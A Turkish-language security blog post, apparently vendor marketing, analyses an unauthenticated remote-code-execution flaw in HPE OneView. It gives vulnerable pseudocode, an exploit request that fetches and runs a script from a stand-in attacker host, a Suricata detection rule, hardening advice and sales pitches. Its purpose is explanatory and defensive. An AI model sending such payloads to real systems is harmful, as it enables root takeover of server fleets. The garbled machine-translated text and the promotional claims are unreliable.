Silikon Ele Geçirmesi: CVE-2025-37164'ün (HPE OneView) Otopsisi ve Yapay Zeka Bilgi İşlem Güvenliğinin Çöküşü

"Bilişimin yeni petrol" olduğu 2026'nın gelişen çağında, fiziksel veri merkezinin güvenliği hiç bu kadar kritik olmamıştı. Kırmızı Ekipler, LLM korkuluklarını aşmak için haftalarca hızlı enjeksiyonlar hazırlarken, BT yığınının bodrum katından çok daha ilkel ve yıkıcı bir tehdit ortaya çıktı.

16 Aralık 2025'te güvenlik dünyası şu bilgilerin ifşa edilmesiyle sarsıldı CVE-2025-37164'deki bir güvenlik açığı HPE OneView nadir ve korkutucu CVSS Puanı 10.0.

Bilmeyenler için HPE OneView, modern yazılım tanımlı altyapı (SDI) için "Tanrı Modu" yazılımıdır. Dünyanın en gelişmiş yapay zeka eğitim kümelerine güç veren çıplak metal canavarları olan binlerce HPE Synergy ve ProLiant sunucusunun sağlanmasını otomatikleştirir.

CVE-2025-37164 bir Kimliği Doğrulanmamış Uzaktan Kod Yürütme (RCE) güvenlik açığı. Yönetim portuna ağ erişimi olan herhangi bir saldırganın root olarak keyfi sistem komutları çalıştırmasına olanak tanıyarak tüm fiziksel filonun anahtarlarını etkin bir şekilde teslim eder. Bu makale, API arızasının cerrahi bir incelemesini ve yapay zeka güvenlik mühendisliği için sonuçlarını gerçekleştirmek için üst düzey özeti terk ediyor.

"Tanrı Modu" Zafiyetinin Mimarisi

Bu kusurun ciddiyetini anlamak için OneView'un rolünü anlamak gerekir. BMC (Baseboard Management Controller) ve iLO (Integrated Lights-Out) arayüzlerinin üzerinde yer alır ve bilgi işlem, depolama ve ağ yapıları üzerindeki kontrolü bir araya getirir.

Güvenlik açığı belirli bir REST API uç noktasında bulunmaktadır: /rest/id-pools/executeCommand.

1. Konfigürasyon Felaketi

Güvenli API tasarımında, sistem komutlarını çalıştırabilen uç noktalar birden fazla katman tarafından korunmalıdır: Kimlik Doğrulama (OAuth/Session), Yetkilendirme (RBAC) ve Girdi Sanitizasyonu.

OneView'in etkilenen sürümlerinde (11.0'dan önce), uç nokta tanımı executeCommand feci bir yapılandırma hatasından muzdaripti. Dahili güvenlik filtresi haritası bu rotayı auth-type: NO_AUTH.

Varsayımsal Arka Uç Mantığı (Java/Spring Sözde Kodu):

Java

`@RestController @RequestMapping("/rest/id-pools") public class IdPoolController {

// FATAL FLAW: Missing @PreAuthorize("isAuthenticated()")
// Bu uç nokta muhtemelen dahili servisler arası iletişim için tasarlanmıştır
// ancak genel arayüze maruz bırakıldı.
@PutMapping("/executeCommand")
public ResponseEntity execute(@RequestBody CommandRequest payload) {
    
    String binary = payload.getCommand();
    String[] args = payload.getArgs();
    
    // FATAL FLAW: ProcessBuilder'a sanitizasyon olmadan doğrudan enjeksiyon
    ProcessBuilder pb = new ProcessBuilder(binary);
    pb.command().addAll(Arrays.asList(args));
    İşlem süreci = pb.start();
    
    return ResponseEntity.ok(readOutput(process));
}

}`

Bu mantık, bir HTTP isteğinden cihazın Linux çekirdeğine doğrudan bir tünel oluşturur.

2. Ölüm Zincirini Yapısöküme Uğratmak

İstismar karmaşıklığı Düşük. Masaj yapmak için bellek bozulması, atlamak için ASLR ve kazanmak için yarış koşulu yoktur. Bu saf ve basit bir mantık hatasıdır.

Exploit Primitive:

Saldırgan bir PUT isteği gönderir. Yük, çalıştırılacak komutu tanımlayan bir JSON nesnesidir.

HTTP

`PUT /rest/id-pools/executeCommand HTTP/1.1 Host: oneview-appliance.local Content-Type: application/json

{ "command": "/bin/sh", "args": ["-c", "wget http://c2.attacker.com/payload.sh -O /tmp/x; chmod +x /tmp/x; /tmp/x"] }`

Sonuç:

Cihaz komut dosyasını çalıştırır. Saldırgan kök ayrıcalıklarına sahip bir ters kabuk alır. Buradan, ağ denetleyicisinin kendisinde kalıcılığa sahip olurlar.

Yapay Zeka Altyapısı Tehdit Ortamı

Bu neden "Zorlu YZ Güvenlik Mühendisi" için özeldir? Çünkü YZ altyapısı bu saldırı sınıfına karşı benzersiz bir şekilde savunmasızdır.

1. GPU Soygunu (Cryptojacking & Hırsızlık)

Yapay zeka eğitim kümeleri, inanılmaz derecede değerli olan H100/B200 GPU'ları kullanır. OneView'a kök erişimi olan bir saldırgan şunları yapabilir:

• Rogue İş Yükleri Sağlama: Kripto para madenciliği yapmak için çıplak metal üzerinde gizli sanal makineler çalıştırarak megawattlarca güç ve soğutma kapasitesini hortumlayın.
• Kaynak Reddi: Kritik bir eğitim çalışması sırasında (milyonlara mal olabilir), saldırgan bir GÜÇ KAPALI komutunu iLO arayüzü üzerinden fiziksel blade'lere göndererek felaket boyutunda veri kaybına ve proje gecikmelerine neden olur.

2. Donanım Yazılımı Yoluyla Tedarik Zinciri Zehirlenmesi

OneView, sunucu filosu için ürün yazılımı güncellemelerini yönetir. Kök erişimi olan bir saldırgan şunları yapabilir:

• Flash Kötü Amaçlı Ürün Yazılımı: BIOS/UEFI'yi savunmasız sürümlere düşürün veya kalıcı rootkit'ler yerleştirin (örneğin BlackLotus) AI sunucularının SPI flaşına yerleştirin.
• Kalıcı Erişim: İşletim sistemi silinip yeniden yüklense bile, kötü amaçlı yazılım donanımda kalır ve bu makinede eğitilen gelecekteki her modeli tehlikeye atar.

3. Veri Göllerine Yanal Hareket

Yüksek performanslı yapay zeka kümeleri, depolama yapıları (Infiniband/RoCE) ile sıkı bir şekilde bağlanır. OneView bu bağlantıları yönetir. OneView'i tehlikeye atmak, bir saldırganın temel NAS/SAN birimlerini monte etmesine olanak tanıyarak kurumsal AD ağına hiç dokunmadan özel veri kümelerine ve model ağırlıklarına doğrudan erişim sağlar.

Yapay Zekaya Dayalı Savunma: Penligent Avantajı

CVE-2025-37164 gibi altyapı güvenlik açıklarını tespit etmek geleneksel Web Uygulama Tarayıcıları (DAST) için kör bir noktadır. DAST araçları HTML'yi tarar; standart olmayan bağlantı noktalarındaki belirsiz yönetim API'lerini nadiren araştırırlar.

İşte burası Penligent.ai Altyapı Güvenliği için bir paradigma değişimini temsil etmektedir.

1. Bant Dışı (OOB) Varlık Haritalama

Penligent'ın Yapay Zeka Temsilcileri Tam Yığın Varlık Haritalama. Sadece web uygulamalarını taramakla kalmazlar; yönetim protokolü imzalarını (IPMI, Redfish, HPE REST API) aktif olarak dinlerler. Yapay zeka, bu imzaları en son tehdit istihbaratı ile ilişkilendirerek BT'nin yamalamayı unuttuğu "Gölge Altyapıyı" tanımlar.

2. Tahribatsız RCE Doğrulaması

Bir üretim yapay zeka kümesini taramak risklidir. Kötü bir tarama sunucuyu çökertebilir. Penligent şunları kullanır Bağlam Farkında Bulanıklaştırma tahribatsız doğrulama gerçekleştirmek için.

• Güvenli Yük: Göndermek yerine rm -rf / veya bir ters kabuk, Penligent aşağıdaki gibi iyi huylu bir yük gönderir echo "Penligent_Check".
• Doğrulama: Yapay zeka HTTP yanıtını analiz eder. Yankılanan dizeyi görürse, RCE'yi 100% kesinliğiyle onaylar ve güvenlik ekibinin eğitim işini çökertmeden yamayı önceliklendirmesine olanak tanır.

Mavi Takım El Kitabı: Algılama ve Güçlendirme

Eğer hemen yama yapamıyorsanız, "İhlal Varsayılan" durumdasınız demektir.

1. Ağ Algılama (Suricata/Snort)

OneView yönetim alt ağına giden trafiği izleyin. HTTP arayın PUT veya POSTA talepleri /rest/id-pools/executeCommand.

Suricata Kuralı:

YAML

alert http $EXTERNAL_NET any -> $ONEVIEW_SERVER 443 (msg: "ET EXPLOIT HPE OneView CVE-2025-37164 RCE Attempt"; \\ flow:established,to_server; \\ content:"/rest/id-pools/executeCommand"; http_uri; \\ content: "command"; http_client_body; \\ content:"/bin/"; http_client_body; \\ classtype:attempted-admin; sid:1000025; rev:1;)

2. Günlük Denetimi

OneView denetim günlüklerini kontrol edin (ci-debug.log veya audit.log) beklenmedik çağrılar için IdPools belirlenmiş Bastion Ana Bilgisayarı olmayan IP adreslerinden gelen denetleyici.

3. Mimari Karantina

• Yönetim VLAN'ı: OneView cihazı arayüzünün, yalnızca MFA'lı bir VPN aracılığıyla erişilebilen, kesinlikle yalıtılmış bir VLAN'da olduğundan emin olun.
• ACL'ler: Sistem yöneticisinin iş istasyonunun belirli IP'si dışında, OneView cihazındaki 443 numaralı bağlantı noktasına giden tüm trafiği engellemek için anahtar düzeyinde Erişim Kontrol Listeleri uygulayın.

Sonuç

CVE-2025-37164 "Bulut "un sadece bir başkasının bilgisayarı olduğunu ve bu bilgisayarın bir yönetim portu bulunduğunu acımasızca hatırlatıyor. AGI'yi inşa etme telaşıyla, üzerinde durduğu somut temeli ihmal etmemeliyiz.

Yapay zeka geleceğinin güvenliği sadece sağlam model hizalamasına değil, aynı zamanda silikon tedarik zincirinin bütünlüğüne de bağlıdır. "Tanrı Modu" konsolunuzun bir saldırganın oyun alanı haline gelmemesini sağlamak için ürün yazılımınızı yükseltin, yönetim düzlemlerinizi izole edin ve akıllı, otomatik doğrulama kullanın.

Güvenilir Referanslar

• HPE Güvenlik Bülteni: HPESBGN04770 (CVE-2025-37164)
• CVE-2025-37164 için NIST NVD Detayı
• CISA Bilinen Açıklar Kataloğu
• Rapid7 Analizi: HPE OneView'u etkileyen Kritik Kimliği Doğrulanmamış RCE

🚀 CTA Seçenekleri

Seçenek 1 (Ağrı Noktası - Önerilen):

DAST tarayıcınız Yönetim API'lerine karşı kör mü? Penligent kör değil.

Altyapınızı görmezden gelmeyi bırakın. Penligent ile yapay zeka bilgi işlem kümenizdeki gizli RCE'leri bugün tespit edin.

Seçenek 2 (Aciliyet):

Bir "Tanrı Modu" hatasının yapay zeka modellerinizi silmesine izin vermeyin.

Penligent'in tahribatsız testi ile HPE OneView güvenlik duruşunuzu anında doğrulayın.